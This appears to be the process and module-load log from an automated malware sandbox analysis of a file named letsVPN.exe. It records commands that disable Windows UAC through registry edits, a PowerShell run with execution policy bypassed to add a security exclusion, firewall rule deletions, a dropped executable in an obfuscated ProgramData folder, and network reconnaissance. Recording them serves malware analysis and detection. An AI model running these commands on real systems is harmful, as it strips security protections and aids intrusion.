              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t reg_dword /d 0 /FJump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v PromptOnSecureDesktop /t reg_dword /d 0 /FJump to behavior
              Source: C:\Windows\System32\mmc.exeProcess created: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exe "C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exe" Jump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ipconfig /allJump to behavior
              Source: C:\Windows\System32\mmc.exeProcess created: C:\ProgramData\letsvpn-latest.exe "C:\ProgramData\letsvpn-latest.exe" Jump to behavior
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -ExecutionPolicy Bypass -File "C:\Program Files (x86)\letsvpn\AddWindowsSecurityExclusion.ps1"
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" findall tap0901
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" install "C:\Program Files (x86)\letsvpn\driver\OemVista.inf" tap0901
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" findall tap0901
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=lets
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=lets.exe
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=LetsPRO.exe
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=LetsPRO
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=LetsVPN
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Program Files (x86)\letsvpn\LetsPRO.exe "C:\Program Files (x86)\letsvpn\LetsPRO.exe" checkNetFramework
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Program Files (x86)\letsvpn\LetsPRO.exe "C:\Program Files (x86)\letsvpn\LetsPRO.exe"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /all
              Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\drvinst.exe DrvInst.exe "4" "0" "C:\Users\user\AppData\Local\Temp\{9d4cf18c-09fd-0e44-8812-c8157ed143b2}\oemvista.inf" "9" "4d14a44ff" "0000000000000158" "WinSta0\Default" "000000000000016C" "208" "c:\program files (x86)\letsvpn\driver"
              Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\System32\drvinst.exe DrvInst.exe "2" "211" "ROOT\NET\0000" "C:\Windows\INF\oem4.inf" "oem4.inf:3beb73aff103cc24:tap0901.ndi:9.24.6.601:tap0901," "4d14a44ff" "000000000000011C"
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=lets
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=lets.exe
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=LetsPRO.exe
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=LetsPRO
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=LetsVPN
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeProcess created: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe "C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe" checkNetFramework
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeProcess created: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe "C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe"
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C ipconfig /all
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C route print
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C arp -a
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /all
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ROUTE.EXE route print
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ARP.EXE arp -a
              Source: C:\Users\user\Desktop\letsVPN.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeSection loaded: oledlg.dllJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeSection loaded: oleacc.dllJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeSection loaded: dataexchange.dllJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeSection loaded: d3d11.dllJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeSection loaded: dcomp.dllJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeSection loaded: dxgi.dllJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeSection loaded: pcacli.dllJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\Desktop\letsVPN.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Windows\System32\ipconfig.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\ipconfig.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\ipconfig.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\ipconfig.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\ipconfig.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: ifmon.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: mprapi.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: rasmontr.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: mfc42u.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: authfwcfg.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: fwpolicyiomgr.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: firewallapi.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: fwbase.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcmonitor.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: dot3cfg.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: dot3api.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: onex.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: eappcfg.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: eappprxy.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: fwcfg.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: hnetmon.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: netshell.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: netsetupapi.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: netiohlp.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: nettrace.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: nshhttp.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: httpapi.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: nshipsec.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: activeds.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: polstore.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: winipsec.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: adsldpc.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: nshwfp.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: cabinet.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: p2pnetsh.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: p2p.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: rpcnsh.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: wcnnetsh.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: wlanapi.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: whhelper.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: wlancfg.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: wshelper.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: wevtapi.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: wwancfg.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: wwapi.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: wcmapi.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: rmclient.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: mobilenetworking.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: peerdistsh.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: ktmw32.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: mprmsg.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\netsh.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: acgenral.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: mfc42u.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: mmcbase.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: duser.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: ninput.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: dui70.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: mmcndmgr.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: oleacc.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: mlang.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: dataexchange.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: d3d11.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: dcomp.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: dxgi.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: twinapi.appcore.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: atlthunk.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: pcacli.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeSection loaded: base.dllJump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeSection loaded: wininet.dllJump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeSection loaded: msvcp120.dllJump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeSection loaded: msvcr120.dllJump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeSection loaded: msimg32.dllJump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeSection loaded: oleacc.dllJump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeSection loaded: winmm.dllJump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeSection loaded: msvcr120.dllJump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeSection loaded: dwmapi.dllJump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeSection loaded: wldp.dllJump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeSection loaded: propsys.dllJump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeSection loaded: napinsp.dllJump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeSection loaded: pnrpnsp.dllJump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeSection loaded: wshbth.dllJump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeSection loaded: nlaapi.dllJump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeSection loaded: winrnr.dllJump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeSection loaded: devenum.dllJump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeSection loaded: devobj.dllJump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeSection loaded: msdmo.dllJump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeSection loaded: avicap32.dllJump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeSection loaded: msvfw32.dllJump to behavior
              Source: C:\ProgramData\0zVlL\Jd0i4~16\sinaplayer_service.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: acgenral.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: mfc42u.dllJump to behavior
              Source: C:\Windows\System32\mmc.exeSection loaded: mmcbase.dllJump to behavior
